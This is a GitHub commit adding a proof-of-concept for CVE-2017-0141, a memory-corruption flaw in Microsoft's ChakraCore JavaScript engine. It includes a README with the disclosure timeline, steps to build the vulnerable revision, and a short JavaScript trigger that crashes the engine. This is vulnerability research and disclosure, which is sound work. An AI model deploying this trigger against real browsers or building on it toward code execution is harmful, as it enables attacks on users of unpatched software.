Skip to content

Commit 4b6a3b8

Browse files
m-y-moGitHub Enterprise
m-y-mo
authored and
GitHub Enterprise
committed
Merge pull request Semmle#6 from kev/ChakraCore_CVE-2017-0141
Proof-of-concept exploit for CVE-2017-0141
2 parents 77d338a + bb55317 commit 4b6a3b8

2 files changed

Lines changed: 44 additions & 0 deletions

File tree

Microsoft/ChakraCore/CVE-2017-0141/README.md

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
# Remote code execution in Microsoft ChakraCore (CVE-2017-0141)
2+
3+
This directory contains a proof of concept exploit for a remote code execution vulnerability in [ChakraCore](https://github.com/Microsoft/ChakraCore), the Javascript engine for Microsoft Edge. The vulnerability was caused by [this pull request](https://github.com/Microsoft/ChakraCore/pull/2196), which was a botched fix for [CVE-2016-7202](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202). Semmle reported the vulnerability to Microsoft on 2016-12-19. Microsoft assigned it [CVE-2017-0141](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0141) and released a fix on [2017-03-14](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0141).
4+
5+
# Reproduction steps
6+
7+
First you need to build the version of ChakraCore with the vulnerability. On Windows, in a VS2015 [developer command prompt](https://docs.microsoft.com/en-us/dotnet/framework/tools/developer-command-prompt-for-vs), run these commands to download and build the vulnerable revision:
8+
9+
```bat
10+
git clone https://github.com/Microsoft/ChakraCore.git
11+
cd ChakraCore
12+
git checkout eecf271764ce0ee8ea58c2ec9c22bc2dd69861e7 &:: Version with "fix" for CVE-2016-7202
13+
msbuild /t:rebuild /m /p:Platform=x64 /p:Configuration=Release Build\Chakra.Core.sln
14+
```
15+
16+
Note: this revision of ChakraCore is too old to build with VS2017. You need VS2015 or earlier.
17+
18+
If the build was successful, then you can run the exploit like this:
19+
20+
```bat
21+
Build\VcBuild\bin\x64_release\ch.exe cve-2017-0141.js
22+
```
23+
24+
This causes ChakraCore to crash with the following error message:
25+
26+
```
27+
FATAL ERROR: ch.exe failed due to exception code c0000005
28+
```

Microsoft/ChakraCore/CVE-2017-0141/cve-2017-0141.js

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
var a = [1];
2+
a.length = 1000;
3+
4+
var o = {};
5+
Object.defineProperty(o, '1', {
6+
get: function() {
7+
for (var i = 0; i < 0x100000; i++) {
8+
a[0x100000 + i] = i;
9+
}
10+
return 2;
11+
}
12+
});
13+
14+
a.__proto__ = o;
15+
16+
var r = [].reverse.call(a);

0 commit comments

Comments
 (0)